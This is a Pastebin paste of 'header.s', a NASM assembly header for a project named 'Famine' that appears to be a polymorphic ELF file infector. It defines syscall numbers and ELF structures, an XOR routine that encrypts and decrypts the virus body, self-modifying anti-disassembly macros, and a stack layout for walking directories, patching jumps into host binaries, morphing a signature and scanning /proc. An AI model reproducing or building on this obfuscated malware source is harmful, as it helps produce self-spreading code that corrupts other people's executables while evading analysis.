API tools faq
paste
Advertisement
FlyFar

header.s

FlyFar
Jun 29th, 2023
1,552
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 9.39 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ; ELF header data for comparisons
  2.  
  3. %define _SYSV_          0x00010102464c457f
  4. %define _GNU_           0x03010102464c457f
  5. %define _DYN_           0x00000001003e0003
  6. %define _EXEC_          0x00000001003e0002
  7. %define SEGMENT_TYPE    0x0000000000000004
  8. %define PF_R            0x4
  9. %define PF_X            0x1
  10. %define PF_W            0x2
  11.  
  12. %define _pwrite         18
  13. %define _read           0x0
  14. %define _exit           60
  15. %define _open           2
  16. %define _close          3
  17. %define _fstat          5
  18. %define _mmap           9
  19. %define _munmap         11
  20. %define _getdents       78
  21. %define _chmod          90
  22. %define _lseek          8
  23. %define _sync           162
  24. %define _fork           0x39
  25.  
  26. ; File acces
  27. %define O_RDONLY            0o0000000
  28. %define O_RDWR              0o0000002
  29. %define O_DIRECTORY         0o0200000
  30. %define PATH_MAX            4096
  31. %define DT_REG              8
  32. %define DT_DIR              4
  33. %define END_SEEK            2
  34. ; mmap
  35. %define PROT_READ           0x1
  36. %define PROT_WRITE          0x2
  37. %define MAP_SHARED          0x01
  38. %define MMAP_ERRORS         -4095
  39.  
  40. ; Famine
  41. %define FAMINE_SIZE         (_end - _start)
  42. %define KEY_SIZE            5
  43. %define STACK(x)            [(rbp - famine_size) + x]
  44. %define DIRENT_ARR_SIZE     1024
  45. %define JMP                 0xe9
  46. %define EHDR_SIZE           64
  47. %define PHDR_SIZE           56
  48.  
  49. %define JUMP_DECYPHER_OFFSET _start.OUI - _start +1
  50. %define KEY_OFFSET          _start.key_offset - _start + 1
  51. %define FACTOR_OFFSET       _start.factor_offset - _start + 2
  52.  
  53. %define RETURN_JUMP_OFFSET  _end - _exx
  54. %define RETURN_JUMP_VALUE_OFFSET _end - _exx - + 5
  55.  
  56. %define SIGNATURE_OFFSET    signature - _start + 44
  57. %define BEGIN_SIGNATURE_OFFSET_FORM_END _end - signature - 1
  58.  
  59. %define POLY_OFFSET_1   _start.label_poly1 - _start
  60. %define POLY_CRAP_SKIPPED_OFFSET inject_self.poly_crap_skipped - _start
  61.  
  62. %macro OBF_POLY_1 0
  63.     OBF_PUSH_RAX
  64.     OBF_PUSH_RDI
  65.     call .pop9
  66.     .pop9:
  67.     pop rdi
  68.     mov rax, rdi
  69.     mov dword[rdi+12], 0x90909090
  70.     pop rdi
  71.     .label_poly1:
  72.     dd 0xAAAAAAAA
  73.     mov rbx, 0x00000000
  74.     mov dword[rax+12], ebx
  75.     pop rax
  76. %endmacro
  77.  
  78.  
  79. %macro POLY_CRAP_SKIPPED 0
  80.     .poly_crap_skipped:
  81.     dd 0xAAAAAAAA
  82.     dd 0xAAAAAAAA
  83.     dd 0xAAAAAAAA
  84.     dd 0xAAAAAAAA
  85.     dd 0xAAAAAAAA
  86.     dd 0xAAAAAAAA
  87.     dd 0xAAAAAAAA
  88. %endmacro
  89. ; MACROS
  90.  
  91. %macro OBF_GENERIC 0
  92. jmp short 0x2
  93. db 0x0F
  94. %endmacro
  95.  
  96. %macro OBF_GENERIC1 0
  97. jmp short 0x2
  98. db 0xDE
  99. %endmacro
  100.  
  101. %macro OBF_GENERIC2 0
  102. jmp short 0x2
  103. db 0xF3
  104. %endmacro
  105.  
  106. %macro OBF_PUSH_RAX 0
  107.     jmp short 5
  108.     push 0x500fDD90
  109. %endmacro
  110.  
  111.  
  112. %macro OBF_PUSH_RBX 0
  113.     jmp short 5
  114.     push 0x53909090
  115. %endmacro
  116.  
  117. %macro OBF_PUSH_RCX 0
  118.     jmp short 5
  119.     push 0x5146EEF0
  120. %endmacro
  121.  
  122. %macro OBF_PUSH_RDX 0
  123.     jmp short 6
  124.     db 0xF8
  125.     push 0x5246EEF0
  126. %endmacro
  127.  
  128. %macro OBF_PUSH_RSI 0
  129.     jmp short 5
  130.     db 0xF8
  131.     dd 0x5646EEF0
  132. %endmacro
  133.  
  134. %macro OBF_PUSH_RDI 0
  135.     jmp short 5
  136.     db 0x03
  137.     dd 0x5702EEc0
  138. %endmacro
  139.  
  140. %macro OBF_PUSH_RBP 0
  141.     jmp short 5
  142.     db 0x03
  143.     dd 0x55380F66
  144. %endmacro
  145.  
  146. %macro OBF_PUSH_RSP 0
  147.     jmp short 5
  148.     db 0x03
  149.     dd 0x543A0F66
  150. %endmacro
  151.  
  152. %macro OBF_PUSH_R8 0
  153.     jmp short 4
  154.     db 0x02
  155.     dd 0x5041A0F6
  156. %endmacro
  157.  
  158. %macro OBF_PUSH_R9 0
  159.     jmp short 4
  160.     db 0x02
  161.     dd 0x5141C3EB
  162. %endmacro
  163.  
  164. %macro OBF_PUSH_R10 0
  165.     jmp short 4
  166.     db 0x02
  167.     dd 0x5241C3D0
  168. %endmacro
  169.  
  170. %macro OBF_OVERWRITE_PUSHR8R9 0
  171.     OBF_PUSH_R8
  172.     call .pop
  173.     .pop:
  174.     pop r8
  175.     mov rax, r8
  176.     mov dword[r8+15], 0x51415041
  177.     pop r8
  178.     dd 0xADE1F1FF
  179.     mov dword[rax+15], 0x0FDE21C3
  180. %endmacro
  181.  
  182. %macro OBF_OVERWRITE_PUSHR10R11 0
  183.     OBF_PUSH_R8
  184.     call .pop1
  185.     .pop1:
  186.     pop r8
  187.     mov rax, r8
  188.     mov dword[r8+15], 0x53415241
  189.     pop r8
  190.     dd 0xFFADE1F1
  191.     mov dword[rax+15], 0xAE0F1233
  192. %endmacro
  193.  
  194. %macro OBF_OVERWRITE_PUSHR12R13 0
  195.     OBF_PUSH_RDI
  196.     call .pop2
  197.     .pop2:
  198.     pop rdi
  199.     mov rax, rdi
  200.     mov dword[rdi+12], 0x55415441
  201.     pop rdi
  202.     dd 0xEEA0FDF1
  203.     mov dword[rax+12], 0xCC010203
  204. %endmacro
  205.  
  206. %macro OBF_OVERWRITE_PUSHR14R15 0
  207.     OBF_PUSH_RDI
  208.     call .pop3
  209.     .pop3:
  210.     pop rdi
  211.     mov rax, rdi
  212.     mov dword[rdi+12], 0x57415641
  213.     pop rdi
  214.     dd 0xEEA0C3F1
  215.     mov dword[rax+12], 0x09e97171
  216. %endmacro
  217.  
  218. %macro OBF_OVERWRITE_POPR9R8 0
  219.     OBF_PUSH_R8
  220.     call .pop4
  221.     .pop4:
  222.     pop r8
  223.     mov rax, r8
  224.     mov dword[r8+15], 0x58415941
  225.     pop r8
  226.     dd 0xADE1F1FF
  227.     mov dword[rax+15], 0xCDCE1212
  228. %endmacro
  229.  
  230. %macro OBF_OVERWRITE_POPR11R10 0
  231.     OBF_PUSH_R8
  232.     call .pop5
  233.     .pop5:
  234.     pop r8
  235.     mov rax, r8
  236.     mov dword[r8+15], 0x5A415B41
  237.     pop r8
  238.     dd 0xFFADE1F1
  239.     mov dword[rax+15], 0x66AEF700
  240. %endmacro
  241.  
  242. %macro OBF_OVERWRITE_POPR13R12 0
  243.     OBF_PUSH_RDI
  244.     call .pop6
  245.     .pop6:
  246.     pop rdi
  247.     mov rax, rdi
  248.     mov dword[rdi+12], 0x5C415D41
  249.     pop rdi
  250.     dd 0xEEA0FDF1
  251.     mov dword[rax+12], 0xBBDFDEAD
  252. %endmacro
  253.  
  254. %macro OBF_OVERWRITE_POPR15R14 0
  255.     OBF_PUSH_RDI
  256.     call .pop7
  257.     .pop7:
  258.     pop rdi
  259.     mov rax, rdi
  260.     mov dword[rdi+12], 0x5E415F41
  261.     pop rdi
  262.     dd 0xEEA0C3F1
  263.     mov dword[rax+12], 0x12131441
  264. %endmacro
  265.  
  266.  
  267.  
  268. %macro OBF_POP_RAX 0
  269.     jmp short 5
  270.     push 0x580fDD90
  271. %endmacro
  272.  
  273.  
  274. %macro OBF_POP_RBX 0
  275.     jmp short 5
  276.     push 0x5B909090
  277. %endmacro
  278.  
  279. %macro OBF_POP_RCX 0
  280.     jmp short 5
  281.     push 0x5941442F
  282. %endmacro
  283.  
  284. %macro OBF_POP_RDX 0
  285.     jmp short 6
  286.     db 0xF8
  287.     push 0x5A26EDA0
  288. %endmacro
  289.  
  290. %macro OBF_POP_RSI 0
  291.     jmp short 5
  292.     db 0xF8
  293.     dd 0x5E666EFC
  294. %endmacro
  295.  
  296. %macro OBF_POP_RDI 0
  297.     jmp short 5
  298.     db 0x0f
  299.     dd 0x5FE4E4c3
  300. %endmacro
  301.  
  302. %macro OBF_POP_RBP 0
  303.     jmp short 5
  304.     db 0x03
  305.     dd 0x5DCCEFFF
  306. %endmacro
  307.  
  308. %macro OBF_POP_RSP 0
  309.     jmp short 5
  310.     db 0x03
  311.     dd 0x5C3AEF6C
  312. %endmacro
  313.  
  314. %macro OBF_POP_R8 0
  315.     jmp short 4
  316.     db 0x02
  317.     dd 0x5841A0F6
  318. %endmacro
  319.  
  320. %macro OBF_POP_R9 0
  321.     jmp short 4
  322.     db 0x02
  323.     dd 0x5941C3EB
  324. %endmacro
  325.  
  326. %macro OBF_POP_R10 0
  327.     jmp short 4
  328.     db 0x02
  329.     dd 0x5A41C3D0
  330. %endmacro
  331.  
  332. %macro PUSH 0
  333.     OBF_PUSH_RAX
  334.     OBF_PUSH_RBX
  335.     OBF_PUSH_RCX
  336.     OBF_PUSH_RDX
  337.     OBF_GENERIC
  338.     OBF_PUSH_RSI
  339.     OBF_PUSH_RDI
  340.     OBF_PUSH_RBP
  341.     OBF_PUSH_RSP
  342.     OBF_OVERWRITE_PUSHR8R9
  343.     OBF_OVERWRITE_PUSHR10R11
  344.     OBF_OVERWRITE_PUSHR12R13
  345.     OBF_OVERWRITE_PUSHR14R15
  346. %endmacro
  347.  
  348. %macro POP 0
  349.     OBF_OVERWRITE_POPR15R14
  350.     OBF_OVERWRITE_POPR13R12
  351.     OBF_OVERWRITE_POPR11R10
  352.     OBF_OVERWRITE_POPR9R8
  353.     OBF_POP_RSP
  354.     OBF_POP_RBP
  355.     OBF_POP_RDI
  356.     OBF_POP_RSI
  357.     OBF_GENERIC
  358.     OBF_POP_RDX
  359.     OBF_POP_RCX
  360.     OBF_POP_RBX
  361.     OBF_POP_RAX
  362. %endmacro
  363.  
  364.  
  365.  
  366. %macro CYPHER 0
  367.     OBF_GENERIC
  368.     xor r11, r11
  369.     mov rdi, STACK(famine.key)  ; key
  370.     OBF_GENERIC2
  371.     mov rax, _start.enc_start
  372.     lea rdx, STACK(famine.tocypher + _start.enc_start - _start)
  373.     mov rcx, enc_end
  374.     sub rcx, rax
  375.     mov r12, STACK(famine.factor)
  376.     OBF_GENERIC
  377.     .cyphering:
  378.         mov r11b, byte [rdx]
  379.         xor r11, rdi
  380.         mov byte [rdx], r11b
  381.         inc rdx
  382.         dec r12
  383.         add rdi, r12
  384.     loop .cyphering
  385. %endmacro
  386.  
  387. %macro DECYPHER 0
  388.     xor r11, r11
  389.     .key_offset:
  390.     mov rdi, 0xAA  ; key
  391.     mov rax, .enc_start
  392.     lea rdx, [rel .enc_start]
  393.     mov rcx, enc_end
  394.     sub rcx, rax
  395.     .factor_offset:
  396.     mov r12, 0xAA
  397.     .decyphering:
  398.         mov r11b, byte [rdx]
  399.         xor r11, rdi
  400.         mov byte [rdx], r11b
  401.         inc rdx
  402.         dec r12
  403.         add rdi, r12
  404.         loop .decyphering
  405. %endmacro
  406. ;Structures
  407.  
  408.     struc   dirent
  409. .d_ino:         resq    1   ; 64-bit inode number
  410. .d_off:         resq    1   ; 64-bit offset to next structure
  411. .d_reclen       resw    1   ; Size of this dirent
  412. .d_name         resb    1   ; Filename (null-terminated)
  413. .pad            resb    0   ;  0 PADDING
  414. .d_type         resb    1   ; byte TYPE
  415.     endstruc
  416.  
  417.  
  418.  
  419.     struc   stat
  420. .st_dev         resq    1   ; ID of device containing file
  421. .__pad1         resw    1   ; Padding
  422. .st_ino         resq    1   ; Inode number
  423. .st_mode        resd    1   ; File type and mode
  424. .st_nlink       resq    1   ; Number of hard links
  425. .st_uid         resd    1   ; User ID of owner
  426. .st_gid         resd    1   ; Group ID of owner
  427. .st_rdev        resq    1   ; Device ID (if special file)
  428. .__pad2         resw    1   ; Padding
  429. .st_size        resq    1   ; Total size, in bytes
  430. .st_blksize     resq    1   ; Block size for filesystem I/O
  431. .st_blocks      resq    1   ; Number of 512B blocks allocated
  432. .st_atim        resq    2   ; Time of last access
  433. .st_mtim        resq    2   ; Time of last modification
  434. .st_ctim        resq    2   ; Time of last status change
  435. .__unused       resq    3   ; Unused
  436.     endstruc
  437.  
  438.  
  439.  
  440. ; ELF headers
  441.  
  442.     struc   elf64_ehdr
  443. .e_ident        resb    16  ; Magic number and other info
  444. .e_type         resw    1   ; Object file type
  445. .e_machine      resw    1   ; Architecture
  446. .e_version      resd    1   ; Object file version
  447. .e_entry        resq    1   ; Entry point virtual address
  448. .e_phoff        resq    1   ; Program header table file offset
  449. .e_shoff        resq    1   ; Section header table file offset
  450. .e_flags        resd    1   ; Processor-specific flags
  451. .e_ehsize       resw    1   ; ELF header size in bytes
  452. .e_phentsize    resw    1   ; Program header table entry size
  453. .e_phnum        resw    1   ; Program header table entry count
  454. .e_shentsize    resw    1   ; Section header table entry size
  455. .e_shnum        resw    1   ; Section header table entry count
  456. .e_shstrndx     resw    1   ; Section header string table index
  457.     endstruc
  458.  
  459.  
  460.  
  461.     struc   elf64_phdr
  462. .p_type         resd    1   ; Segment type
  463. .p_flags        resd    1   ; Segment flags
  464. .p_offset       resq    1   ; Segment file offset
  465. .p_vaddr        resq    1   ; Segment virtual address
  466. .p_paddr        resq    1   ; Segment physical address
  467. .p_filesz       resq    1   ; Segment size in file
  468. .p_memsz        resq    1   ; Segment size in memory
  469. .p_align        resq    1   ; Segment alignment
  470.     endstruc
  471.  
  472. ; Structure for our variables on stack
  473.  
  474.     struc   famine
  475. .dirents        resb    DIRENT_ARR_SIZE ; Array of dirents
  476. .dir_fd         resq    1               ; Directory fd
  477. .file_path      resb    PATH_MAX        ; File path Buffer
  478. .new_dir        resb    PATH_MAX
  479. .file_fd        resq    1               ; Open file fd
  480. .stat           resb    stat_size       ; Buffer for stat struct
  481. .file_size      resq    1               ; Size of open file
  482. .jmp            resb    5               ; jmp :  e9 xx xx xx xx
  483. .file_data      resq    1               ; Pointer to mmapped file data
  484. .status_str     resb    110             ; buf for /proc/self/status
  485. .tocypher       resb    0x5000          ; location to cyphered v
  486. .key            resb    1               ; location to key
  487. .factor         resb    1               ; factor to derivate key
  488. .morph_sign_u   resb    1               ; factor to add to signature
  489. .morph_sign_d   resb    1               ; factor to add to ssignature  tenth
  490. .tmp_rand       resw    1               ;
  491. .commpath       resb    100             ; path to commfiles
  492. .dirents_proc   resb    DIRENT_ARR_SIZE ; Array of dirents for /proc
  493. endstruc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!